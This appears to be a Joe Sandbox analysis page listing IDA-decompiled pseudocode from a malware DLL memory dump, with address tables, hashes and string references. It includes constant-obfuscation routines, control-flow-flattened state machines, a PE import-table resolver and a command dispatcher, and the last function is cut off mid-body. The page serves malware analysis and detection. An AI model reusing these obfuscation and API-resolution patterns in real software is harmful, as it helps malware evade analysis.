			E1001CAA0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t121;
				void* _t139;
				void* _t143;
				void* _t145;
				void* _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int* _t174;

				_push(_a16);
				_t165 = _a4;
				_t143 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t121);
				_v88 = 0xa345;
				_t174 =  &(( &_v96)[6]);
				_t166 = 0;
				_t145 = 0x388706b5;
				_t167 = 0x17;
				_v88 = _v88 / _t167;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0xb586a132;
				_v88 = _v88 ^ 0xb586a8c9;
				_v68 = 0x3c18;
				_t168 = 0x75;
				_v68 = _v68 / _t168;
				_v68 = _v68 | 0xfaaa2e7e;
				_v68 = _v68 ^ 0xfaaa5d3e;
				_v72 = 0x292c;
				_t169 = 0x30;
				_v72 = _v72 / _t169;
				_t170 = 0x7d;
				_v72 = _v72 / _t170;
				_v72 = _v72 ^ 0x00000df9;
				_v64 = 0xacd5;
				_v64 = _v64 + 0x8377;
				_v64 = _v64 ^ 0x00014058;
				_v92 = 0x91f4;
				_v92 = _v92 ^ 0x59127442;
				_v92 = _v92 ^ 0xd1a3ee64;
				_v92 = _v92 ^ 0x1200e02f;
				_v92 = _v92 ^ 0x9ab1bc65;
				_v76 = 0x8653;
				_v76 = _v76 | 0x93bc935f;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x3bc90d53;
				_v96 = 0x9841;
				_t171 = 0x42;
				_v96 = _v96 / _t171;
				_v96 = _v96 * 0x19;
				_v96 = _v96 * 0x44;
				_v96 = _v96 ^ 0x000f441a;
				_v56 = 0xfe3f;
				_v56 = _v56 + 0xc16;
				_v56 = _v56 ^ 0x000102f3;
				_v60 = 0xb3bd;
				_v60 = _v60 + 0xffff84e2;
				_v60 = _v60 ^ 0x0000629b;
				_v80 = 0x779;
				_v80 = _v80 << 0xa;
				_v80 = _v80 << 2;
				_v80 = _v80 | 0x746c3a89;
				_v80 = _v80 ^ 0x747fb8a8;
				_v84 = 0x97f4;
				_v84 = _v84 ^ 0xacb5c4e6;
				_v84 = _v84 * 0x15;
				_v84 = _v84 | 0x645395ef;
				_v84 = _v84 ^ 0x6edfb60f;
				do {
					while(_t145 != 0x10d238e9) {
						if(_t145 == 0x13bcd39c) {
							_t139 = E1001D290(_v64, _v92, _v76, _t165, _v96,  &_v52);
							_t174 =  &(_t174[4]);
							__eflags = _t139;
							if(__eflags != 0) {
								_t145 = 0x30fa29dc;
								continue;
							}
						} else {
							if(_t145 == 0x30fa29dc) {
								__eflags = E10009899(_t165 + 4, _v56, __eflags,  &_v52, _v60, _v80, _v84);
								_t166 =  !=  ? 1 : _t166;
							} else {
								if(_t145 != 0x388706b5) {
									goto L9;
								} else {
									_t145 = 0x10d238e9;
									continue;
								}
							}
						}
						L12:
						return _t166;
					}
					E1001F3E9(_v88, _v68, _v72, _t143,  &_v52);
					_t174 =  &(_t174[3]);
					_t145 = 0x13bcd39c;
					L9:
					__eflags = _t145 - 0x2a61d71f;
				} while (__eflags != 0);
				goto L12;
			}

0x1001caa7
0x1001caae
0x1001cab2
0x1001cab4
0x1001cabb
0x1001cac2
0x1001cac3
0x1001cac4
0x1001cac5
0x1001caca
0x1001cad2
0x1001cadb
0x1001cadd
0x1001cae4
0x1001cae9
0x1001caef
0x1001caf4
0x1001cafc
0x1001cb04
0x1001cb10
0x1001cb15
0x1001cb1b
0x1001cb23
0x1001cb2b
0x1001cb37
0x1001cb3c
0x1001cb46
0x1001cb4b
0x1001cb51
0x1001cb59
0x1001cb61
0x1001cb69
0x1001cb71
0x1001cb79
0x1001cb81
0x1001cb89
0x1001cb91
0x1001cb99
0x1001cba1
0x1001cba9
0x1001cbae
0x1001cbb6
0x1001cbc2
0x1001cbc5
0x1001cbce
0x1001cbd7
0x1001cbdb
0x1001cbe3
0x1001cbeb
0x1001cbf3
0x1001cbfb
0x1001cc03
0x1001cc0b
0x1001cc13
0x1001cc1b
0x1001cc20
0x1001cc2a
0x1001cc32
0x1001cc3a
0x1001cc42
0x1001cc4f
0x1001cc53
0x1001cc5b
0x1001cc63
0x1001cc63
0x1001cc6d
0x1001cc99
0x1001cc9e
0x1001cca1
0x1001cca3
0x1001cca5
0x00000000
0x1001cca5
0x1001cc6f
0x1001cc75
0x1001ccf8
0x1001ccfa
0x1001cc77
0x1001cc7d
0x00000000
0x1001cc7f
0x1001cc7f
0x00000000
0x1001cc7f
0x1001cc7d
0x1001cc75
0x1001ccfe
0x1001cd06
0x1001cd06
0x1001ccbe
0x1001ccc3
0x1001ccc6
0x1001cccb
0x1001cccb
0x1001cccb
0x00000000

Strings

/, xrefs: 1001CB89
,), xrefs: 1001CB2B

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,)$/
API String ID: 0-233899039
Opcode ID: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
Instruction ID: 65b2c97f17a7b7744a18fbb07baf764625514e653d75bdddd1878b23c210d4d9
Opcode Fuzzy Hash: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
Instruction Fuzzy Hash: 82516571508345AFE354CF21C489A1BBBE1FBC8788F40891DF4A69A2A0D775DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100056B3, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E100056B3(void* __edx, char _a4, signed short _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ecx;
				void* _t84;
				void* _t91;
				signed short _t97;
				signed short _t98;
				signed short _t99;
				signed int _t101;
				signed int _t102;
				intOrPtr _t111;
				signed short _t113;
				signed short* _t116;
				signed short _t117;
				signed short _t119;
				signed int* _t121;

				_t99 = _a8;
				_push(_a12);
				_push(_t99);
				_push(_a4);
				_push(__edx);
				E100056B2(_t84);
				_a8 = 0xbb3c;
				_t121 =  &(( &_v24)[5]);
				_a8 = _a8 + 0xffff0478;
				_a8 = _a8 << 0xb;
				_a8 = _a8 + 0xfffffb27;
				_a8 = _a8 ^ 0xfdfd9b26;
				_v16 = 0x694e;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffffd888;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xf6f4b2b2;
				_v4 = 0xcfd5;
				_t101 = 0x77;
				_v4 = _v4 / _t101;
				_v4 = _v4 ^ 0x00007af6;
				_v20 = 0x3853;
				_v20 = _v20 + 0x2f57;
				_v20 = _v20 << 0xc;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x33d5042f;
				_v24 = 0x48cf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xa5d7;
				_v24 = _v24 ^ 0x227c1387;
				_v24 = _v24 ^ 0x227cf043;
				_v8 = 0x820c;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x047d7705;
				_v12 = 0x55c9;
				_v12 = _v12 + 0xffff6fb2;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xff8ad068;
				_t102 = _a8;
				_t91 =  *((intOrPtr*)(_t99 + 0x3c)) + _t99;
				_t111 =  *((intOrPtr*)(_t91 + 0x78 + _t102 * 8));
				if(_t111 == 0 ||  *((intOrPtr*)(_t91 + 0x7c + _t102 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t117 = _t111 + _t99;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0xc));
						if( *((intOrPtr*)(_t117 + 0xc)) == 0) {
							goto L13;
						}
						_t113 = E10018DF5(_t94 + _t99, _v16, _v4, _v20, _v24);
						_t121 =  &(_t121[3]);
						_a8 = _t113;
						__eflags = _t113;
						if(_t113 == 0) {
							L15:
							return 0;
						}
						_t116 =  *_t117 + _t99;
						_t119 =  *((intOrPtr*)(_t117 + 0x10)) + _t99;
						while(1) {
							_t97 =  *_t116;
							__eflags = _t97;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t105 = _t99 + 2 + _t97;
								__eflags = _t99 + 2 + _t97;
							} else {
								_t105 = _t97 & 0x0000ffff;
							}
							_t98 = E1000CDD0(_t105, _v8, _v12, _t113);
							__eflags = _t98;
							if(_t98 == 0) {
								goto L15;
							} else {
								_t113 = _a8;
								_t116 =  &(_t116[2]);
								 *_t119 = _t98;
								_t119 =  &_a4;
								__eflags = _t119;
								continue;
							}
						}
						_t117 = _t117 + 0x14;
						__eflags = _t117;
					}
					goto L13;
				}
			}

0x100056b7
0x100056be
0x100056c2
0x100056c3
0x100056c7
0x100056c9
0x100056ce
0x100056d6
0x100056d9
0x100056e3
0x100056e8
0x100056f0
0x100056f8
0x10005700
0x10005705
0x1000570d
0x10005712
0x1000571a
0x10005728
0x1000572b
0x1000572f
0x10005737
0x1000573f
0x10005747
0x1000574c
0x10005751
0x10005759
0x10005761
0x10005766
0x1000576e
0x10005776
0x1000577e
0x1000578b
0x10005794
0x10005798
0x100057a0
0x100057a8
0x100057b0
0x100057b5
0x100057c0
0x100057c4
0x100057c6
0x100057cc
0x10005847
0x00000000
0x100057d5
0x100057d5
0x10005840
0x10005840
0x10005845
0x00000000
0x00000000
0x100057f2
0x100057f4
0x100057f7
0x100057fb
0x100057fd
0x10005852
0x00000000
0x10005852
0x10005804
0x10005806
0x10005837
0x10005837
0x10005839
0x1000583b
0x00000000
0x00000000
0x1000580a
0x10005814
0x10005814
0x1000580c
0x1000580c
0x1000580c
0x1000581f
0x10005826
0x10005828
0x00000000
0x1000582a
0x1000582a
0x1000582e
0x10005831
0x10005834
0x10005834
0x00000000
0x10005834
0x10005828
0x1000583d
0x1000583d
0x1000583d
0x00000000
0x10005840

Strings

W/, xrefs: 1000573F
Ni, xrefs: 100056F8

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ni$W/
API String ID: 0-111194442
Opcode ID: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
Instruction ID: 9a1005561c3df8b761318bfd7a223ab57cf0a9f60e4c9267babe61ed4d5f545d
Opcode Fuzzy Hash: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
Instruction Fuzzy Hash: 544168B15083428FE354CF24C88480BBBF1FBC4798F518A2CF99596255EB76DA09CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1001DD78, Relevance: 2.6, Strings: 2, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001DD78(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t69;
				void* _t73;
				void* _t76;
				intOrPtr _t79;
				signed int* _t81;

				_t73 = __ecx;
				_t81 =  &_v40;
				_v8 = 0x1b7700;
				_t79 = 0;
				_v4 = 0;
				_t76 = 0xdac552c;
				_v16 = 0x3c26;
				_v16 = _v16 | 0x2b145b71;
				_v16 = _v16 ^ 0x2b14102b;
				_v40 = 0xd45e;
				_v40 = _v40 ^ 0x28d15431;
				_v40 = _v40 * 0xf;
				_v40 = _v40 | 0xf1f7d666;
				_v40 = _v40 ^ 0xf5f7dcd7;
				_v20 = 0xc134;
				_v20 = _v20 ^ 0xfce9bf97;
				_v20 = _v20 ^ 0xfce94421;
				_v24 = 0x60c0;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00000a32;
				_v12 = 0x6ec6;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x000ddcb5;
				_v28 = 0xb783;
				_v28 = _v28 + 0x4382;
				_v28 = _v28 + 0xd9fc;
				_v28 = _v28 ^ 0x0001ab03;
				_v36 = 0xe117;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 | 0x4f01522f;
				_v36 = _v36 + 0xffffd003;
				_v36 = _v36 ^ 0x4f014085;
				_v32 = 0xf8b3;
				_v32 = _v32 * 0x65;
				_v32 = _v32 + 0xc87a;
				_v32 = _v32 ^ 0x0062f8e1;
				do {
					while(_t76 != 0x15fecb3) {
						if(_t76 == 0xdac552c) {
							_t76 = 0x15fecb3;
							continue;
						} else {
							if(_t76 != 0x172cce4b) {
								goto L8;
							} else {
								_t79 = _t79 + E10007544(_v12, _v28, _v36, _t73 + 4, _v32);
							}
						}
						L5:
						return _t79;
					}
					_t69 = E10007E30();
					_t81 = _t81 - 0xc + 0xc;
					_t76 = 0x172cce4b;
					_t79 = _t79 + _t69;
					L8:
				} while (_t76 != 0x1c39a7d);
				goto L5;
			}

0x1001dd78
0x1001dd78
0x1001dd7b
0x1001dd86
0x1001dd8d
0x1001dd91
0x1001dd93
0x1001dda0
0x1001dda8
0x1001ddb0
0x1001ddb8
0x1001ddcb
0x1001ddcf
0x1001ddd7
0x1001dddf
0x1001dde7
0x1001ddef
0x1001ddf7
0x1001ddff
0x1001de04
0x1001de0c
0x1001de14
0x1001de19
0x1001de21
0x1001de29
0x1001de31
0x1001de39
0x1001de41
0x1001de49
0x1001de4e
0x1001de56
0x1001de5e
0x1001de66
0x1001de73
0x1001de77
0x1001de7f
0x1001de87
0x1001de87
0x1001de8d
0x1001debb
0x00000000
0x1001de8f
0x1001de91
0x00000000
0x1001de93
0x1001deaf
0x1001deaf
0x1001de91
0x1001deb2
0x1001deba
0x1001deba
0x1001ded2
0x1001ded7
0x1001deda
0x1001dedc
0x1001dede
0x1001dede
0x00000000

Strings

&<, xrefs: 1001DD93
2, xrefs: 1001DE04

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &<$2
API String ID: 0-12532211
Opcode ID: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction ID: 2d2181df3d2bb9c93a47c4eee62150f0e4f5b302c766535f93e70661617adfa9
Opcode Fuzzy Hash: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction Fuzzy Hash: D73167719083418FD304EF25DA4A40FBBE1FBD4758F104A2EF485A6220D3B9DA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 10013D7C, Relevance: 1.4, Strings: 1, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10013D7C(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* __ecx;
				void* _t185;
				signed int _t212;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				void* _t250;

				_push(_a12);
				_t250 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t185);
				_v84 = _v84 & 0x00000000;
				_v80 = _v80 & 0x00000000;
				_v92 = 0x2af249;
				_v88 = 0xa239d;
				_v72 = 0x3311;
				_v72 = _v72 | 0x7bf224ce;
				_v72 = _v72 ^ 0x7bf237de;
				_v36 = 0xf7a4;
				_v36 = _v36 + 0xffffc682;
				_v36 = _v36 + 0xffffc2a9;
				_v36 = _v36 ^ 0x000086db;
				_v68 = 0xdbd1;
				_v68 = _v68 + 0xcfce;
				_v68 = _v68 ^ 0x0001a39f;
				_v12 = 0x5909;
				_v12 = _v12 + 0x65b0;
				_v12 = _v12 >> 1;
				_v12 = _v12 + 0xffff8c6d;
				_v12 = _v12 ^ 0xfffff7ad;
				_v44 = 0x56e3;
				_v44 = _v44 + 0x126;
				_t216 = 9;
				_v44 = _v44 / _t216;
				_v44 = _v44 ^ 0x00003ea1;
				_v8 = 0x9ec;
				_t217 = 0xc;
				_v8 = _v8 / _t217;
				_t218 = 0xf;
				_v8 = _v8 / _t218;
				_v8 = _v8 ^ 0x5389c1c6;
				_v8 = _v8 ^ 0x53898368;
				_v56 = 0x8b50;
				_t219 = 0x7c;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x0042a85f;
				_v64 = 0xa08d;
				_v64 = _v64 + 0xcc80;
				_v64 = _v64 ^ 0x00016541;
				_v40 = 0x6173;
				_v40 = _v40 | 0xc384fcd4;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0x7efba2ce;
				_v24 = 0xc6dd;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffff231a;
				_v24 = _v24 ^ 0x00179bda;
				_v48 = 0xc35f;
				_v48 = _v48 << 0xc;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x00004803;
				_v32 = 0xc90e;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x0001a766;
				_v76 = 0x4072;
				_v76 = _v76 / _t219;
				_v76 = _v76 ^ 0x00003c70;
				_v28 = 0x9423;
				_v28 = _v28 + 0xffff4e74;
				_t220 = 0x19;
				_v28 = _v28 * 0x2e;
				_v28 = _v28 ^ 0xfffa9c10;
				_v16 = 0x38cb;
				_v16 = _v16 ^ 0x15f5157f;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xf435;
				_v16 = _v16 ^ 0x7d4c407a;
				_v52 = 0x39bb;
				_v52 = _v52 + 0xffffae06;
				_v52 = _v52 ^ 0xce0d0fc0;
				_v52 = _v52 ^ 0x31f2a856;
				_v60 = 0xc52f;
				_t221 = 0x65;
				_v60 = _v60 / _t220;
				_v60 = _v60 ^ 0x00004cfc;
				_v20 = 0xe49b;
				_v20 = _v20 + 0xf3d2;
				_v20 = _v20 / _t221;
				_v20 = _v20 ^ 0x00007d6c;
				E10001CB3( &_v124, _v12, 0x1e, _v44);
				E10001CB3( &_v644, _v8, 0x208, _v56);
				E10001CB3( &_v1164, _v64, 0x208, _v40);
				E10015891(_a12,  &_v644, _v24, _v48, _v32);
				E10015891(_t250,  &_v1164, _v76, _v28, _v16);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v68 | _v36;
				_t212 = E1001C9E4(_v60, _v20,  &_v124);
				asm("sbb eax, eax");
				return  ~_t212 + 1;
			}

0x10013d87
0x10013d8a
0x10013d8c
0x10013d8f
0x10013d92
0x10013d94
0x10013d99
0x10013d9f
0x10013da3
0x10013daa
0x10013db1
0x10013db8
0x10013dbf
0x10013dc6
0x10013dcd
0x10013dd4
0x10013ddb
0x10013de2
0x10013de9
0x10013df0
0x10013df7
0x10013dfe
0x10013e05
0x10013e08
0x10013e0f
0x10013e16
0x10013e1d
0x10013e29
0x10013e2e
0x10013e33
0x10013e3a
0x10013e44
0x10013e49
0x10013e51
0x10013e56
0x10013e5b
0x10013e62
0x10013e69
0x10013e74
0x10013e75
0x10013e78
0x10013e7f
0x10013e86
0x10013e8d
0x10013e94
0x10013e9b
0x10013ea2
0x10013ea6
0x10013ead
0x10013eb4
0x10013eb8
0x10013ebf
0x10013ec6
0x10013ecd
0x10013ed1
0x10013ed5
0x10013edc
0x10013ee3
0x10013ee7
0x10013eeb
0x10013ef2
0x10013efe
0x10013f03
0x10013f0a
0x10013f11
0x10013f1e
0x10013f21
0x10013f24
0x10013f2b
0x10013f32
0x10013f39
0x10013f3d
0x10013f44
0x10013f4b
0x10013f52
0x10013f59
0x10013f60
0x10013f67
0x10013f73
0x10013f74
0x10013f79
0x10013f80
0x10013f87
0x10013f96
0x10013f99
0x10013fa8
0x10013fbf
0x10013fd1
0x10013fe8
0x10013ffe
0x10014009
0x10014012
0x1001401b
0x10014024
0x10014035
0x1001403e
0x10014046

Strings

z@L}, xrefs: 10013F44

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: z@L}
API String ID: 0-656678828
Opcode ID: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
Instruction ID: 64054118f8c6f46c4d0f59fa63d6518252241b9f119ebe30aefd6ecd3cb38e95
Opcode Fuzzy Hash: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
Instruction Fuzzy Hash: 18812072D0020DEBEF14CFA1D98A9DEBBB2FB44314F208159E415B6290D7B91A4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 10018831, Relevance: 1.4, Strings: 1, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10018831(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				char _v120;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t125;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t161;
				void* _t163;
				void* _t165;
				void* _t166;

				_t166 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t100);
				_v40 = 0xa9e3;
				_v40 = _v40 | 0x2174341f;
				_v40 = _v40 ^ 0x2174d138;
				_t161 = 0;
				_v28 = 0xd1b7;
				_v28 = _v28 >> 6;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x0000747d;
				_v24 = 0x8bdd;
				_t131 = 0x3c;
				_v24 = _v24 / _t131;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x00001716;
				_v20 = 0xbd7b;
				_t132 = 0x56;
				_v20 = _v20 * 0x24;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00355362;
				_v12 = 0x1776;
				_t133 = 0x74;
				_v12 = _v12 / _t132;
				_v12 = _v12 + 0xffffd771;
				_v12 = _v12 * 0x66;
				_v12 = _v12 ^ 0xffefd8ce;
				_v36 = 0xe780;
				_v36 = _v36 + 0xffff8307;
				_v36 = _v36 ^ 0x00001dc1;
				_v32 = 0x334f;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x0066d4a3;
				_v44 = 0xfc2;
				_v44 = _v44 + 0xffff2eb0;
				_v44 = _v44 ^ 0xffff18b3;
				_v16 = 0xf408;
				_v16 = _v16 + 0xffff10d6;
				_v16 = _v16 << 0xf;
				_v16 = _v16 / _t133;
				_v16 = _v16 ^ 0x000527d6;
				E1001F3E9(_v40, _v28, _v24, __edx,  &_v120);
				_t165 = _t163 + 0x18;
				L15:
				_t113 = E10009899( &_v52, _v20, _t166,  &_v120, _v12, _v36, _v32);
				_t165 = _t165 + 0x10;
				if(_t113 != 0) {
					__eflags = E1001C04C( &_v68, _v44,  &_v52, _v16);
					if(__eflags != 0) {
						_t117 = _v64 - 1;
						__eflags = _t117;
						if(_t117 == 0) {
							E100177C0(_v68,  &_v60);
						} else {
							_t119 = _t117 - 1;
							__eflags = _t119;
							if(_t119 == 0) {
								E10007E34(_v68,  &_v60);
							} else {
								_t121 = _t119 - 1;
								__eflags = _t121;
								if(_t121 == 0) {
									E10003D4E(_v68,  &_v60);
								} else {
									_t123 = _t121 - 1;
									__eflags = _t123;
									if(_t123 == 0) {
										E10012965(_v68,  &_v60);
									} else {
										_t125 = _t123 - 6;
										__eflags = _t125;
										if(_t125 == 0) {
											E10001658(_v68,  &_v60);
										} else {
											__eflags = _t125 == 1;
											if(_t125 == 1) {
												E10002DEE(_v68,  &_v60);
											}
										}
									}
								}
							}
						}
						_t161 = _t161 + 1;
						__eflags = _t161;
					}
					goto L15;
				}
				return _t161;
			}

0x10018831
0x10018839
0x1001883e
0x1001883f
0x10018840
0x10018845
0x1001884f
0x10018858
0x1001885f
0x10018861
0x10018868
0x1001886c
0x10018870
0x10018877
0x10018883
0x10018888
0x1001888d
0x10018891
0x10018898
0x100188a3
0x100188a6
0x100188a9
0x100188ac
0x100188b3
0x100188bf
0x100188c0
0x100188c5
0x100188d0
0x100188d3
0x100188da
0x100188e1
0x100188e8
0x100188ef
0x100188f6
0x100188fa
0x10018901
0x10018908
0x1001890f
0x10018916
0x1001891d
0x10018924
0x1001892d
0x10018933
0x10018945
0x1001894a
0x100189cb
0x100189de
0x100189e3
0x100189e8
0x10018963
0x10018965
0x1001896a
0x1001896a
0x1001896b
0x100189c5
0x1001896d
0x1001896d
0x1001896d
0x1001896e
0x100189b8
0x10018970
0x10018970
0x10018970
0x10018971
0x100189ab
0x10018973
0x10018973
0x10018973
0x10018974
0x1001899e
0x10018976
0x10018976
0x10018976
0x10018979
0x10018991
0x1001897b
0x1001897b
0x1001897c
0x10018984
0x10018984
0x1001897c
0x10018979
0x10018974
0x10018971
0x1001896e
0x100189ca
0x100189ca
0x100189ca
0x00000000
0x10018965
0x100189f5

Strings

bS5, xrefs: 100188AC

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: bS5
API String ID: 0-1932987624
Opcode ID: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
Instruction ID: 23e059ff47e0506498e7a4e708a724e5c8e2fef518cb1c354503f8202edbf6a6
Opcode Fuzzy Hash: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
Instruction Fuzzy Hash: ED512671D0421EDBDF08CFA1D9468EEBBB1FF44344F148119E405BA294EBB5AB86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001B1D2, Relevance: 1.4, Strings: 1, Instructions: 132
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001B1D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr* _t121;
				void* _t123;
				void* _t134;
				signed int* _t136;

				_t136 =  &_v40;
				_v40 = 0x70f8;
				_v40 = _v40 >> 7;
				_v40 = _v40 + 0xffff630a;
				_t118 = 0x64;
				_v40 = _v40 / _t118;
				_v40 = _v40 ^ 0x028f2fd3;
				_t134 = 0x35b1160f;
				_v16 = 0x47d6;
				_v16 = _v16 ^ 0xd8da0719;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x6c6d66b3;
				_v36 = 0xc09c;
				_t119 = 0x42;
				_v36 = _v36 / _t119;
				_v36 = _v36 | 0x4c951b1c;
				_t120 = 0x76;
				_v36 = _v36 / _t120;
				_v36 = _v36 ^ 0x00a646bb;
				_v4 = 0xd906;
				_v4 = _v4 + 0xffffa865;
				_v4 = _v4 ^ 0x0000cebc;
				_v12 = 0x1924;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x5770cda5;
				_v12 = _v12 ^ 0x57146551;
				_v20 = 0x57d8;
				_v20 = _v20 + 0x3c9b;
				_v20 = _v20 | 0x6624950d;
				_v20 = _v20 + 0x7d86;
				_v20 = _v20 ^ 0x662576da;
				_v24 = 0x7f33;
				_v24 = _v24 + 0x8e9f;
				_v24 = _v24 * 0x52;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x15f1c515;
				_v8 = 0xdf1f;
				_v8 = _v8 ^ 0x9b779287;
				_v8 = _v8 << 4;
